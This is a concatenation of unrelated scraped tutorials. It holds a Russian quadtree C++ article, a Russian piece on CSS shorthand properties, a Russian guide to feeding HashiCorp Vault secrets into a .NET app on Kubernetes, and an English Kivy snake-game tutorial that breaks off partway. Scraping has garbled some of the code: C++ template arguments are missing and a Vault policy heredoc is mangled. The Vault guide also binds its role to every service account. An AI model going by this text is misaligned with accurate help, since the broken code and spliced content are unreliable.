Вот скелет класса [`Quadtree`](https://github.com/pvigier/Quadtree/blob/master/include/Quadtree.h):
```
template, typename Float = float>
class Quadtree
{
static\_assert(std::is\_convertible\_v, Box>,
"GetBox must be a callable of signature Box(const T&)");
static\_assert(std::is\_convertible\_v, bool>,
"Equal must be a callable of signature bool(const T&, const T&)");
static\_assert(std::is\_arithmetic\_v);
public:
Quadtree(const Box& box, const GetBox& getBox = GetBox(),
const Equal& equal = Equal()) :
mBox(box), mRoot(std::make\_unique()), mGetBox(getBox), mEqual(equal)
{
}
private:
static constexpr auto Threshold = std::size\_t(16);
static constexpr auto MaxDepth = std::size\_t(8);
struct Node
{
std::array, 4> children;
std::vector values;
};
Box mBox;
std::unique\_ptr mRoot;
GetBox mGetBox;
Equal mEqual;
bool isLeaf(const Node\* node) const
{
return !static\_cast(node->children[0]);
}
};
```
Как можно заметить, `Quadtree` — это класс-шаблон. Это позволит нам использовать класс для различных целей, о которых я говорил в начале.
Параметры шаблона:
* `T`: тип значений, которые будут содержаться в quadtree. `T` должен быть лёгким классом, потому что он будет хранится внутри quadtree. В идеале это должен быть указатель или небольшая простая структура данных (POD).
* `GetBox`: тип вызываемого объекта, который будет получать значение на входе и возвращать прямоугольник.
* `Equal`: тип вызываемого объекта для проверки равенства двух значений. По умолчанию мы используем стандартный оператор равенства.
* `Float`: арифметический тип, используемый в вычислениях. По умолчанию мы используем `float`.
В начале определения класса есть три статических допущения (assertion) для проверки правильности параметров шаблона.
Давайте взглянем на определение узла. Узел просто хранит указатели на свои четыре дочерних узла и список содержащихся в нём значений. Мы не храним в нём его ограничивающий прямоугольник или глубину, они будут вычисляться на лету.
Я провёл бенчмарки обоих подходов (с сохранением прямоугольника с глубиной и без сохранения) и не обнаружил снижения производительности при вычислении их на лету. Более того, так экономится немного памяти.
Чтобы иметь возможность отличать внутренний узел от листа, существует метод `isLeaf`. Он просто проверяет, что первый дочерний элемент не равен null. Так как null являются или все дочерние узлы, или ни один из них, достаточно проверять только первый.
Теперь мы можем рассмотреть переменные-члены `Quadtree`:
* `mBox` — это глобальный ограничивающий прямоугольник. Все вставляемые в quadtree значения должны содержаться внутри него.
* `mRoot` — корень quadtree.
* `mGetBox` — вызываемый объект, который мы будем использовать для получения прямоугольника из значения.
* `mEqual` — вызываемый объект, который мы будем использовать для проверки равенства двух значений.
Конструктор просто задаёт `mBox`, `mGetBox` и `mEqual`, а также создаёт корневой узел.
Последние два параметра, о которых мы ещё не говорили — это `Threshold` и `MaxDepth`. `Threshold` — максимальное количество значений, которое может содержать узел, прежде чем мы его разделим. `MaxDepth` — это максимальная глубина узла, мы прекращаем пытаться разделить узлы, которые находятся на `MaxDepth`, потому что если разделять слишком много, это может помешать производительности. Я задал этим константам разумные значения, подходящие для большинства случаев. Можете попробовать оптимизировать их под свою конфигурацию.
Теперь мы готовы приступить к более интересным операциям.
Вставка и удаление
==================
Прежде чем я покажу код вставки, нам нужно обсудить то, какие узлы будут содержать значения. Существует две стратегии:
* Значения хранятся только в листьях. Так как ограничивающий прямоугольник значения может взаимодействовать с несколькими листьями, значение будет храниться во всех этих листьях.
* Значения могут храниться во всех узлах. Мы сохраняем значение в наименьший узел, который полностью содержит его ограничивающий прямоугольник.
Если ограничивающие прямоугольники малы и имеют примерно одинаковый размер, то при поиске пересечений более эффективна первая стратегия. Однако, если существуют большие прямоугольники, могут возникать вырожденные случаи, при которых производительность будет очень плохой. Например, если мы вставим значение, прямоугольник которого находится в глобальном ограничивающем прямоугольнике, то оно будет добавлено во все листья. А если мы вставим `Threshold` для таких значений, то все узлы будут разделяться, пока не достигнут `MaxDepth` и значения не окажутся во всех листьях. Следовательно, quadtree будет содержать  значений, а это… много.
Более того, при первой стратегии вставка и удаление будут немного медленнее, потому что нам придётся вставлять (или удалять) все узлы, пересекающие значение.
Поэтому я буду использовать вторую стратегию, в которой не бывает вырожденных случаев. Так как я планирую применять quadtree в различных контекстах, это будет удобнее. Кроме того, такая стратегия больше подходит для динамических контекстов, в которых для обновления значений выполняется множество вставок и удалений, например, в физическом движке, где сущности перемещаются.
Чтобы узнать, в какой узел мы будем вставлять или удалять значение, воспользуемся двумя вспомогательными функциями.
Первая, `computeBox`, вычисляет прямоугольник дочернего узла по прямоугольнику родительского узла и индекс его квадранта.
```
Box computeBox(const Box& box, int i) const
{
auto origin = box.getTopLeft();
auto childSize = box.getSize() / static\_cast(2);
switch (i)
{
// North West
case 0:
return Box(origin, childSize);
// Norst East
case 1:
return Box(Vector2(origin.x + childSize.x, origin.y), childSize);
// South West
case 2:
return Box(Vector2(origin.x, origin.y + childSize.y), childSize);
// South East
case 3:
return Box(origin + childSize, childSize);
default:
assert(false && "Invalid child index");
return Box();
}
}
```
Вторая, `getQuadrant`, возвращает квадрант, в котором находится значение:
```
int getQuadrant(const Box& nodeBox, const Box& valueBox) const
{
auto center = nodeBox.getCenter();
// West
if (valueBox.getRight() < center.x)
{
// North West
if (valueBox.getBottom() < center.y)
return 0;
// South West
else if (valueBox.top >= center.y)
return 2;
// Not contained in any quadrant
else
return -1;
}
// East
else if (valueBox.left >= center.x)
{
// North East
if (valueBox.getBottom() < center.y)
return 1;
// South East
else if (valueBox.top >= center.y)
return 3;
// Not contained in any quadrant
else
return -1;
}
// Not contained in any quadrant
else
return -1;
}
```
Она возвращает `-1`, если оно не содержится ни в одном из квадрантов.
Теперь мы готовы рассмотреть методы вставки и удаления.
Вставка
-------
Метод `add` просто вызывает приватный вспомогательный метод:
```
void add(const T& value)
{
add(mRoot.get(), 0, mBox, value);
}
```
Вот код вспомогательного метода:
```
void add(Node* node, std::size_t depth, const Box& box, const T& value)
{
assert(node != nullptr);
assert(box.contains(mGetBox(value)));
if (isLeaf(node))
{
// Insert the value in this node if possible
if (depth >= MaxDepth || node->values.size() < Threshold)
node->values.push\_back(value);
// Otherwise, we split and we try again
else
{
split(node, box);
add(node, depth, box, value);
}
}
else
{
auto i = getQuadrant(box, mGetBox(value));
// Add the value in a child if the value is entirely contained in it
if (i != -1)
add(node->children[static\_cast(i)].get(), depth + 1, computeBox(box, i), value);
// Otherwise, we add the value in the current node
else
node->values.push\_back(value);
}
}
```
В начале расположена пара допущений, проверяющих, что мы не делаем ничего нелогичного, например, не вставляем значение в узел, не содержащий его ограничивающий прямоугольник.
Затем, если узел является листом, и мы можем вставить в него новое значение, т.е. мы не достигли `MaxDepth` или `Threshold`, выполняем вставку. В противном случае мы разделяем этот узел и пробуем снова.
Если узел внутренний, то вычисляем квадрант, в котором содержится ограничивающий прямоугольник значения. Если он полностью содержится в дочернем узле, выполняем рекурсивный вызов. В противном случае, выполняем вставку в этот узел.
Вот процедура разделения:
```
void split(Node* node, const Box& box)
{
assert(node != nullptr);
assert(isLeaf(node) && "Only leaves can be split");
// Create children
for (auto& child : node->children)
child = std::make\_unique();
// Assign values to children
auto newValues = std::vector(); // New values for this node
for (const auto& value : node->values)
{
auto i = getQuadrant(box, mGetBox(value));
if (i != -1)
node->children[static\_cast(i)]->values.push\_back(value);
else
newValues.push\_back(value);
}
node->values = std::move(newValues);
}
```
Мы создаём четыре дочерних узла, а затем для каждого значения родительского узла решаем, в каком узле (дочернем или родительском) должно храниться значение.
Удаление
--------
Метод `remove` тоже просто вызывает вспомогательный метод:
```
void remove(const T& value)
{
remove(mRoot.get(), nullptr, mBox, value);
}
```
Вот код вспомогательного метода, он очень похож на код вставки:
```
void remove(Node* node, Node* parent, const Box& box, const T& value)
{
assert(node != nullptr);
assert(box.contains(mGetBox(value)));
if (isLeaf(node))
{
// Remove the value from node
removeValue(node, value);
// Try to merge the parent
if (parent != nullptr)
tryMerge(parent);
}
else
{
// Remove the value in a child if the value is entirely contained in it
auto i = getQuadrant(box, mGetBox(value));
if (i != -1)
remove(node->children[static\_cast(i)].get(), node, computeBox(box, i), value);
// Otherwise, we remove the value from the current node
else
removeValue(node, value);
}
}
```
Если текущий узел является листом, то мы удаляем значение из списка значений текущего узла
и пытаемся объединить этот узел с сестринскими узлами и его родителем. В противном случае, мы определяем, в каком квадранте находится ограничивающий прямоугольник значения. Если он полностью содержится в дочернем узле, то выполняем рекурсивный вызов. В противном случае, удаляем из значений текущего узла.
Так как нас не волнует порядок хранимых в узле значений, при стирании я использую небольшую оптимизацию: просто меняю стираемое значение с последним и удаляю его:
```
void removeValue(Node* node, const T& value)
{
// Find the value in node->values
auto it = std::find_if(std::begin(node->values), std::end(node->values),
[this, &value](const auto& rhs){ return mEqual(value, rhs); });
assert(it != std::end(node->values) && "Trying to remove a value that is not present in the node");
// Swap with the last element and pop back
*it = std::move(node->values.back());
node->values.pop_back();
}
```
Также нам нужно взглянуть на `tryMerge`:
```
void tryMerge(Node* node)
{
assert(node != nullptr);
assert(!isLeaf(node) && "Only interior nodes can be merged");
auto nbValues = node->values.size();
for (const auto& child : node->children)
{
if (!isLeaf(child.get()))
return;
nbValues += child->values.size();
}
if (nbValues <= Threshold)
{
node->values.reserve(nbValues);
// Merge the values of all the children
for (const auto& child : node->children)
{
for (const auto& value : child->values)
node->values.push_back(value);
}
// Remove the children
for (auto& child : node->children)
child.reset();
}
}
```
`tryMerge` проверяет, что все дочерние узлы являются листьями и что общее количество его значений и значений дочерних узлов меньше, чем threshold. Если это так, то мы копируем все значения из дочерних узлов в текущий узел и удаляем дочерние узлы.
Поиск пересечений
=================
Пересечение с прямоугольником
-----------------------------
Наконец, мы добрались до самого интересного: до поиска пересечений. Первый способ применения — получение всех значений, пересекающих заданный прямоугольник. Например, это нужно для выполнения отсечения.
Этим будет заниматься `query`:
```
std::vector query(const Box& box) const
{
auto values = std::vector();
query(mRoot.get(), mBox, box, values);
return values;
}
```
В этом методе мы просто выделяем `std::vector`, который будет содержать значения, пересекающие ограничивающий прямоугольник, и вызываем вспомогательный метод:
```
void query(Node* node, const Box& box, const Box& queryBox, std::vector& values) const
{
assert(node != nullptr);
assert(queryBox.intersects(box));
for (const auto& value : node->values)
{
if (queryBox.intersects(mGetBox(value)))
values.push\_back(value);
}
if (!isLeaf(node))
{
for (auto i = std::size\_t(0); i < node->children.size(); ++i)
{
auto childBox = computeBox(box, static\_cast(i));
if (queryBox.intersects(childBox))
query(node->children[i].get(), childBox, queryBox, values);
}
}
}
```
Сначала мы складываем все значения, хранящиеся в текущем узле, которые пересекаются с запрашиваемым прямоугольником. Затем, если текущий узел является внутренним, мы выполняем рекурсивный вызов для каждого дочернего узла, чей ограничивающий прямоугольник пересекается с запрашиваемым прямоугольником.
Все попарные пересечения
------------------------
Второй поддерживаемый способ применения — поиск всех хранящихся в дереве квадрантов пар значений, которые пересекаются. Это особенно полезно при создании физического движка. Данную задачу можно решить при помощи метода `query`. И в самом деле, мы можем вызвать `query` для ограничивающего прямоугольника всех значений. Однако, это можно сделать более эффективно, добавляя только по одному пересечению для пары (при помощи `query` мы будем находить их дважды).
Чтобы реализовать это, нам нужно учесть, что пересечение может происходить только
* между двумя значениями, хранящимися в одном узле
или
* между значением, хранящимся в узле, и ещё одним значением, хранящемся в потомке этого узла.
Благодаря этому мы должны проверять только пересечение между:
* значением и следующими значениями, хранящимися в том же узле
и
* значением и значениями, хранящимися в потомке.
Таким образом, мы точно не будем дважды сообщать об одном пересечении.
Вот код `findAllIntersections`:
```
std::vector> findAllIntersections() const
{
auto intersections = std::vector>();
findAllIntersections(mRoot.get(), intersections);
return intersections;
}
```
Мы снова просто выделяем `std::vector` для хранения пересечений и вызываем вспомогательную функцию:
```
void findAllIntersections(Node* node, std::vector>& intersections) const
{
// Find intersections between values stored in this node
// Make sure to not report the same intersection twice
for (auto i = std::size\_t(0); i < node->values.size(); ++i)
{
for (auto j = std::size\_t(0); j < i; ++j)
{
if (mGetBox(node->values[i]).intersects(mGetBox(node->values[j])))
intersections.emplace\_back(node->values[i], node->values[j]);
}
}
if (!isLeaf(node))
{
// Values in this node can intersect values in descendants
for (const auto& child : node->children)
{
for (const auto& value : node->values)
findIntersectionsInDescendants(child.get(), value, intersections);
}
// Find intersections in children
for (const auto& child : node->children)
findAllIntersections(child.get(), intersections);
}
}
```
На первом этапе проверяются пересечения между значениями, хранящимися в текущем узле. Затем, если текущий узел является внутренним, при помощи `findIntersectionInDescendants` проверяются пересечения между значениями, хранящимися в этом узле и значениями, хранящимися в его потомках. Наконец, мы выполняем рекурсивные вызовы.
`findIntersectionsInDescendants` рекурсивно находит пересечения между заданным значением и всеми значениями, хранящимися в поддереве:
```
void findIntersectionsInDescendants(Node* node, const T& value, std::vector>& intersections) const
{
// Test against the values stored in this node
for (const auto& other : node->values)
{
if (mGetBox(value).intersects(mGetBox(other)))
intersections.emplace\_back(value, other);
}
// Test against values stored into descendants of this node
if (!isLeaf(node))
{
for (const auto& child : node->children)
findIntersectionsInDescendants(child.get(), value, intersections);
}
}
```
Вот и всё! Повторюсь, весь код выложен на [GitHub](https://github.com/pvigier/Quadtree).
Полезные ресурсы
================
Если вы хотите больше узнать о распознавании коллизий и структурах данных разбиения пространства, то рекомендую прочитать книгу Кристера Эриксона [Real-Time Collision Detection](http://realtimecollisiondetection.net/). В ней глубоко раскрыто множество тем и при этом книга написана очень понятным языком. Более того, главы можно читать по отдельности. Это отличный справочный источник.
Заключение
==========
На этом работа с распознаванием коллизий завершена. Однако оно является только половиной физического движка. Вторая половина — это [разрешение коллизий](https://pvigier.github.io/2019/08/11/vagabond-2d-physics-engine.html). | https://habr.com/ru/post/473066/ | null | ru | null |
# Сокращённые свойства

> Зачем задавать картинку через `background-image`, если можно просто написать `background`?
CSS-свойство `background` — это сокращение целой группы свойств: `background-color`, `image`, `attachment`, `position` и других. Вместо того чтобы писать целую батарею свойств, иногда бывает удобно просто задать `background` и описать всё в нём.
```
background-color
background-image
background-position
background-size
background-repeat
```
А ещё `background` просто короче: как вам при наборе, так и пользователю при загрузке ваших стилей с остальным сайтом. Ну, сплошные плюсы, давайте писать только сокращённые свойства! Шах и мат.
В целом: если вы пишете одну простую штучку, которой один раз задаёте фон, то проблем никаких. Но если вы уже начали мыслить модульно, комбинируете несколько классов на одном элементе или знаете что такое модификаторы для блоков — проблема есть.
Например, вы описали в классе `.first` свойства фона в `background`, но специально не указали картинку. А потом классом `.second` добавляете элементу картинку свойством `background-image`. И всё хорошо, картинка просто добавляется: `.first`, `.second`.
```
.first {
background: red no-repeat;
}
.second {
background-image: url(pic.png);
}
```
Но если наоборот: сначала `background-image`, а потом остальное в сокращённом свойстве `background`, то картинки уже не будет — она затрётся. [Эх, каскад](https://htmlacademy.ru/courses/66), беспощадная ты сволочь.
```
.second {
background-image: url(pic.png);
}
.first {
background: red no-repeat;
}
```
Подумаешь! — скажете вы, — я просто буду внимательнее и не допущу такого. Я в вас верю и наверняка всё будет хорошо. Но лучше сразу применять подходы, которые не допускают даже случайных ошибок, правильно? Все мы люди.
Если мы опишем свойства фона в обоих классах полными свойствами вместо сокращённых, то, как ни крути, классы — всё будет в порядке, они друг друга дополнят. А ещё это позволяет удобнее читать стили: порядок свойств в сокращённом свойстве background произвольный и все пишут как им нравится.
```
.first {
background-color: red;
background-repeat: no-repeat;
}
.second {
background-image: url(pic.png);
}
```
О похожем [писал звезда фронтенда Гарри Робертс](https://csswizardry.com/2016/12/css-shorthand-syntax-considered-an-anti-pattern/) и прямо называл сокращённые свойства антипаттерном. Обязательно почитайте, все ссылки будут в описании к видео.
Есть много простых сокращённых свойств: `font`, `list-style`, `border`, `padding`, `margin` и другие. Но есть сложные или просто пока новые для вас — их проще понимать в отдельной записи.
Одно из самых моих любимых — свойство `animation`. Я долго не мог запомнить [его синтаксис](https://developer.mozilla.org/en/docs/Web/CSS/animation), пока однажды не решил записывать его всегда по частям: `animation-name`, `duration`, `timing-function` и так далее. И всё встало на свои места.
```
.wat {
animation:
3s ease-in
1s 2 reverse both
paused slidein;
}
```
Та же история с сокращённым свойством `flex`: оно объединяет `flex-grow`, `shrink` и `basis`. И если вы иногда долго смотрите на какой-нибудь `flex: 0 0 1` или силитесь понять эту магию, то просто запишите их отдельно и всё станет понятнее.
Запомните: сокращённые свойства удобно писать, но сложно комбинировать и понимать, поэтому пишите модульные стили или новые для вас свойства развёрнуто.
Видеоверсия
-----------
Вопросы можно задавать [здесь](https://htmlacademy.ru/shorts). | https://habr.com/ru/post/337274/ | null | ru | null |
# .NET и HashiCorp Vault: Использование секретов в настройках .NET Core приложения
Настройка
---------
Для работы нам понадобится настроенный к8s кластер, можно использовать [Minkube](https://minikube.sigs.k8s.io/docs/) или [k3s](https://k3s.io/). Также необходимо установить [helm](https://helm.sh/docs/intro/install/)и [jq](https://stedolan.github.io/jq/download/)**.**
Установка Vault
---------------
HashiCorp рекомендует устанавливать Vault используя официальный [helm chart](https://developer.hashicorp.com/vault/docs/platform/k8s/helm).
Добавим официальный репозиторий.
```
$helm repo add hashicorp https://helm.releases.hashicorp.com
"hashicorp" has been added to your repositories
```
Обновим репозиторий до последней версии.
```
$helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "hashicorp" chart repository
Update Complete. ⎈Happy Helming!⎈
```
Установим последнюю версию чарта, наша установка будет без HA, при использовании в продуктивной среде желательно ставить с HA.
```
$helm install vault hashicorp/vault --set='server.ha.enabled=false'
NAME: vault
LAST DEPLOYED: Sun Dec 18 08:54:20 2022
NAMESPACE: default
STATUS: deployed
REVISION: 1
NOTES:
Thank you for installing HashiCorp Vault!
Now that you have deployed Vault, you should look over the docs on using
Vault with Kubernetes available here:
https://www.vaultproject.io/docs/
Your release is named vault. To learn more about the release, try:
$ helm status vault
$ helm get manifest vault
```
Проверяем, что все установилось.
```
$kubectl get po
NAME READY STATUS RESTARTS AGE
vault-0 0/1 Running 0 3m9s
vault-agent-injector-77fd4cb69f-4brdw 1/1 Running 0 3m9s
```
Под vault-0 в статусе Running, но еще не готов к обработке запросов, так как мы его еще не проинициализировали. Посмотрим его статус.
```
$kubectl exec vault-0 -- vault status
Key Value
--- -----
Seal Type shamir
Initialized false
Sealed true
Total Shares 0
Threshold 0
Unseal Progress 0/0
Unseal Nonce n/a
Version 1.12.1
Build Date 2022-10-27T12:32:05Z
Storage Type file
HA Enabled false
```
Мы видим, что Vault еще не проинициализирован и запечатан.
Инициализация Vault
--------------------
При первичной установке Vault запускается не проинициализированным и запечатанным.
Инициализируем с сохранением настроек в файл.
```
$kubectl exec vault-0 -- vault operator init \
-key-shares=1 -key-threshold=1 -format=json > cluster-keys.json
```
Сохраним Vault unseal key в переменную среды и распечатаем.
```
$VAULT_UNSEAL_KEY=$(cat cluster-keys.json | jq -r ".unseal_keys_b64[]")
$kubectl exec vault-0 -- vault operator unseal $VAULT_UNSEAL_KEY
Key Value
--- -----
Seal Type shamir
Initialized true
Sealed false
Total Shares 1
Threshold 1
Version 1.12.1
Build Date 2022-10-27T12:32:05Z
Storage Type file
Cluster Name vault-cluster-cdeb59eb
Cluster ID 67d6948e-529e-98e1-e86b-d83342f0584f
HA Enabled false
```
Vault настроен и готов к работе.
### Настройка секретов
Наше приложение будет брать настройки из секретов. Для создания секрета нужно войти в систему с root token, включить [key-value secret engine](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2), и сохранить наши секреты.
Сначала сохраним рутовый токен в переменную среды.
```
$export VAULT_ROOT_TOKEN=$(cat cluster-keys.json | jq -r ".root_token")
```
Запустим новую терминальную сессию в контейнере Vault и передадим туда переменную.
```
$kubectl exec --stdin=true --tty=true vault-0 \
-- /bin/sh -c "env VAULT_ROOT_TOKEN=$(echo $VAULT_ROOT_TOKEN) /bin/sh"
```
Теперь логинимся в Vault.
```
/ $ vault login $VAULT_ROOT_TOKEN
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.
Key Value
--- -----
token
token\_accessor
token\_duration ∞
token\_renewable false
token\_policies ["root"]
identity\_policies []
policies ["root"]
```
Включаем хранилище секретов kv-v2 с путем secrets.
```
/ $ vault secrets enable -path=secrets kv-v2
Success! Enabled the kv-v2 secrets engine at: secrets/
```
Создаем секрет для нашего приложения.
```
/ $ vault kv put secrets/services/dotnet username='Bob' password='Bob_Password'
======== Secret Path ========
secrets/data/services/dotnet
======= Metadata =======
Key Value
--- -----
created_time 2022-12-18T10:26:35.169923707Z
custom_metadata
deletion\_time n/a
destroyed false
version 1
```
Проверяем что секрет доступен по пути secrets/services/dotnet.
```
/ $ vault kv get secrets/services/dotnet
======== Secret Path ========
secrets/data/services/dotnet
======= Metadata =======
Key Value
--- -----
created_time 2022-12-18T10:26:35.169923707Z
custom_metadata
deletion\_time n/a
destroyed false
version 1
====== Data ======
Key Value
--- -----
password Bob\_Password
username Bob
```
### Настройка аутентификации в Kubernetes
Рутовый токен является привилегированным пользователем, который может выполнять любые операции на любом пути. Нашему же приложению требуется только возможность чтения секретов, определенных на одном пути. Для этого приложение должно пройти аутентификацию и получить токен с ограниченным доступом.
Включаем аутентификацию через Kubernetes.
```
/ $ vault auth enable kubernetes
Success! Enabled kubernetes auth method at: kubernetes/
```
Настраиваем доступ к API Kubernetes.
```
/ $ vault write auth/kubernetes/config \
kubernetes_host="https://$KUBERNETES_PORT_443_TCP_ADDR:443"
Success! Data written to: auth/kubernetes/config
```
Создаем политику с именем service, которая включает возможность чтения для секретов по пути secrets/data/services/dotnet.
```
/ $ vault policy write service - < path "secrets/data/services/dotnet" {
> capabilities = ["read"]
> }
> EOF
Success! Uploaded policy: service
```
Создаем роль для аутентификации в Kubernetes с именем service.
```
/ $ vault write auth/kubernetes/role/service \
> bound_service_account_names=* \
> bound_service_account_namespaces=* \
> policies=service \
> ttl=24h
Success! Data written to: auth/kubernetes/role/service
```
### Настройка приложения
Тестовое приложение доступно на [github](https://github.com/nkz-soft/dotnet-k8s-vault).
```
$git clone https://github.com/nkz-soft/dotnet-k8s-vault
```
Приложение разворачивается в кластере с помощью helm chart.
```
$cd dotnet-k8s-vault/deployment/k8s/.helm/
$helm install dotnet-vault .
NAME: dotnet-vault
LAST DEPLOYED: Sun Dec 18 11:28:47 2022
NAMESPACE: default
STATUS: deployed
REVISION: 1
NOTES:
1. Get the application URL by running these commands:
export NODE_PORT=$(kubectl get --namespace default -o jsonpath="{.spec.ports[0].nodePort}" services dotnet-vault)
export NODE_IP=$(kubectl get nodes --namespace default -o jsonpath="{.items[0].status.addresses[0].address}")
echo http://$NODE_IP:$NODE_PORT
```
Проверим, что мы можем прочитать содержимое секрета.
```
$export DOTNET_K8S_VAULT_PORT=$(kubectl get svc dotnet-vault -o json | jq -r ".spec.ports[].nodePort")
$curl localhost:$DOTNET_K8S_VAULT_PORT/config
{"VaultSecrets":null,"VaultSecrets:userName":"Bob","VaultSecrets:password":"Bob_Password"}
```
### Как это работает
Содержимое файла Program.cs.
```
var builder = WebApplication.CreateBuilder(args);
builder.Services.AddHealthChecks();
builder.Configuration
.AddJsonFile("appsettings.json", optional: true, reloadOnChange: true)
.AddJsonFile($"appsettings.{builder.Environment.EnvironmentName}.json", optional: true, reloadOnChange: true)
.AddJsonFile("/vault/secrets/appsettings.json", optional: true, reloadOnChange: true);
var app = builder.Build();
app.MapHealthChecks("/healthz");
app.MapGet("/config",
(IConfiguration configuration) => Results.Ok
(configuration.GetSection("VaultSecrets")
.AsEnumerable().ToDictionary(k => k.Key, v => v.Value)));
app.Run();
```
Приложение будет читать настройки из файла секрета /vault/secrets/appsettings.json и отображать текущие настройки по адресу <http://localhost/config>
Содержимое файла configmap.yaml на основании которого создается шаблон.
```
apiVersion: v1
kind: ConfigMap
metadata:
name: {{ include "dotnet-vault.fullname" . }}
labels:
{{- include "dotnet-vault.labels" . | nindent 4 }}
data:
appsettings.json: |
{
"VaultSecrets": {
{{` {{- with secret "secrets/data/services/dotnet" }}
"userName": "{{ .Data.data.username }}",
"password": "{{ .Data.data.password }}"
{{- end }} `}}
}
}
```
Deployment использует следующие аннотации:
```
vault.hashicorp.com/agent-inject: "true"
vault.hashicorp.com/agent-copy-volume-mounts: 'dotnet-vault'
vault.hashicorp.com/agent-inject-secret-appsettings.json: ""
vault.hashicorp.com/agent-inject-template-file-appsettings.json: '/vault/config/appsettings.json'
vault.hashicorp.com/role: service
```
1. Подключаем sidecar Vault агента.
2. Копируем данные из подключенного тома.
3. Подключаем конфигурационный и шаблонный файлы.
4. Устанавливаем необходимую роль для доступа.
В результате в поде агента будет лежать шаблон.
```
/ $ cat vault/config/appsettings.json
{
"VaultSecrets": {
{{- with secret "secrets/data/services/dotnet" }}
"userName": "{{ .Data.data.username }}",
"password": "{{ .Data.data.password }}"
{{- end }}
}
}
```
А уже готовый сгенерированный файл настроек который будет создаваться при старте пода агента.
```
/ $ cat /vault/secrets/appsettings.json
{
"VaultSecrets": {
"userName": "Bob",
"password": "Bob_Password"
}
}
``` | https://habr.com/ru/post/707802/ | null | ru | null |
# Yet Another Android snake with Kivy, Python
Hello, there.
[UPD from 2021: I highly recommend following this tutorial with an utmost caution]
A lot of people want to start programming apps for Android, but they prefer not to use Android Studio and/or Java. Why? Because it's an overkill. «I just wanna create Snake and nothing more!»

Let's snake without java! (with a bonus at the end)
**Why create yet another snake tutorial?**
If you are a python coder and want to learn gamedev for android, you must have already googled «snake on android» and found [this (Eng)](https://www.digitaljunky.io/make-a-snake-game-for-android-written-in-python-part-2/) or its [translation (Rus)](https://tproger.ru/translations/snake-android-python-kivy/). So did I. Unfortunately, I found the article extremely useless because:
##### Their code is bad
Minor issues:
1. Using «tile» and «head» instead of «tiles» or «cells» doesn't make sense to me. The head is not distinct enough from the tile to be different variables.
2. Clock.schedule for self.update is called from… self.update.
3. Second-level class Playground is implemented in the beginning, while first-level class SnakeApp is implemented at the end.
4. Names for directions («up», «down», ...) are used instead of vectors ( (0, 1), (1, 0)… ).
Major issues:
1. Most dynamic objects (for example, the fruit) are attached to the kv file, so you can't make more than 1 apple because then you should rewrite this part
2. Weird logic for the snake's motion instead of «cell-after-cell» motion.
3. The code is very long being more than 350 lines.
##### The article is not clear for novices
This is my PERSONAL opinion. Moreover, I do not guarantee that my tutorial will be more interesting and clear. But I'll do my best and, for my article, guarantee that:
1. The code is short
2. The snake is nice
3. The instructions will have clear step-by-step implementations and smooth progression from «hello, world» to a ready snake with transitional steps.
##### The undesirable result

No space between the cells, the triangle is embarrassing, graphics are glitchy.
Get familiarized
================
### First app
Please, confirm that you have already installed Kivy (if not, follow the [instructions](https://buildmedia.readthedocs.org/media/pdf/kivy/master/kivy.pdf)) and ran
`buildozer init` in the project directory.
Let's run our first app:
main.py
```
from kivy.app import App
from kivy.uix.widget import Widget
class WormApp(App):
def build(self):
return Widget()
if __name__ == '__main__':
WormApp().run()
```

We created a Widget. Analogously, we can create a button or any other UI element:
```
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.button import Button
class WormApp(App):
def build(self):
self.but = Button()
self.but.pos = (100, 100)
self.but.size = (200, 200)
self.but.text = "Hello, cruel world"
self.form = Widget()
self.form.add_widget(self.but)
return self.form
if __name__ == '__main__':
WormApp().run()
```

Wow! Congratulations! You've created a button!
### .kv files
However, there's another way to create UI elements. First, we implement our form:
```
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.button import Button
class Form(Widget):
def __init__(self):
super().__init__()
self.but1 = Button()
self.but1.pos = (100, 100)
self.add_widget(self.but1)
class WormApp(App):
def build(self):
self.form = Form()
return self.form
if __name__ == '__main__':
WormApp().run()
```
Then, we create «worm.kv» file.
worm.kv
```
:
but2: but\_id
Button:
id: but\_id
pos: (200, 200)
```
What just happened? We created another Button and assign id but\_id. Then, but\_id was matched to but2 of the form. It means that now we can refer to this button by but2
```
class Form(Widget):
def __init__(self):
super().__init__()
self.but1 = Button()
self.but1.pos = (100, 100)
self.add_widget(self.but1) #
self.but2.text = "OH MY"
```

### Graphics
What we do next is creating a graphical element. First, we implement it in worm.kv:
```
:
:
canvas:
Rectangle:
size: self.size
pos: self.pos
```
We linked the rectangle's position to self.pos and its size to self.size. So now those properties are available from Cell, for example, once we create a cell, we can do
```
class Cell(Widget):
def __init__(self, x, y, size):
super().__init__()
self.size = (size, size) # As you can see, we can change self.size which is "size" property of a rectangle
self.pos = (x, y)
class Form(Widget):
def __init__(self):
super().__init__()
self.cell = Cell(100, 100, 30)
self.add_widget(self.cell)
```

Ok, we have created a cell.
### Necessary methods
Let's try to move it. To do that, we should add Form.update function and schedule it.
```
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.clock import Clock
class Cell(Widget):
def __init__(self, x, y, size):
super().__init__()
self.size = (size, size)
self.pos = (x, y)
class Form(Widget):
def __init__(self):
super().__init__()
self.cell = Cell(100, 100, 30)
self.add_widget(self.cell)
def start(self):
Clock.schedule_interval(self.update, 0.01)
def update(self, _):
self.cell.pos = (self.cell.pos[0] + 2, self.cell.pos[1] + 3)
class WormApp(App):
def build(self):
self.form = Form()
self.form.start()
return self.form
if __name__ == '__main__':
WormApp().run()
```
The cell will move across the form. As you can see, we can schedule any function with Clock.
Next, let's make a touch event. Rewrite Form:
```
class Form(Widget):
def __init__(self):
super().__init__()
self.cells = []
def start(self):
Clock.schedule_interval(self.update, 0.01)
def update(self, _):
for cell in self.cells:
cell.pos = (cell.pos[0] + 2, cell.pos[1] + 3)
def on_touch_down(self, touch):
cell = Cell(touch.x, touch.y, 30)
self.add_widget(cell)
self.cells.append(cell)
```
Each touch\_down creates a cell with coordinates = (touch.x, touch.y) and size of 30. Then, we add it as a widget of the form AND to our own array (in order to easily access them).
Now you can tap on your form and generate cells.

### Neat settings
Because we want to get a nice snake, we should distinguish the graphical positions and the actual positions of cells.
**Why?**
A lot of reasons to do so. All logic should be connected with the so-called actual data, while the graphical data is the result of the actual data. For example, if we want to make margins, the actual pos of the cell will be (100, 100) while the graphical pos of the rectangle — (102, 102).
